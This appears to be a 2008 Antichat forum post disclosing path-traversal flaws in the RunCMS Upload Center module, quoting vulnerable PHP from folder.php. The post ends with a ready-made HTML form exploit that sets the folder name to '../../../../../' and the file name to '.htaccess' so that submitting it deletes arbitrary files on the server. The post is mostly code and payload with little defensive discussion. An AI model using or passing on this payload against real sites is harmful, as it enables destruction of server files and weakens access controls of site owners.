21.07.2008, 00:05
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
RunCMS Module Upload Center Delete File Vulnerability
version: latest -- 1.01
Showing list files Vulnerability
Vuln Code:/folder.php
PHP код:
function listfiles() {
global $ucConfig, $xoopsUser, $_GET;
if (!$xoopsUser) {
header("Location:".XOOPS_URL."/whyregister.php");
}
else {
$foldername = $_GET['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
$userfolderpath = "./cache/files/".$userfoldername;
$imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
$imgpath = "./cache/files/".$userfoldername."/".$foldername;
$subfolderpath = $userfolderpath."/".$foldername;
$total = dir_stats($userfolderpath);
.....
Delete File Vulnerability
Vuln Code:/folder.php
PHP код:
function deletefile() {
global $xoopsUser, $_POST;
$filename = $_POST['filename'];
$foldername = $_POST['foldername'];
$userfoldername = $xoopsUser->getVar("uid");
if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
@unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
}
}
Код:
<form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
<input type="hidden" name="foldername" value="../../../../../" /><input type="hidden" name="filename" value=".htaccess" />
<input type="submit" class="button" value="Delete"></td></form>
ZAMUT ©
__________________
в строю
Последний раз редактировалось ZAMUT; 21.07.2008 в 00:07..
|
|
|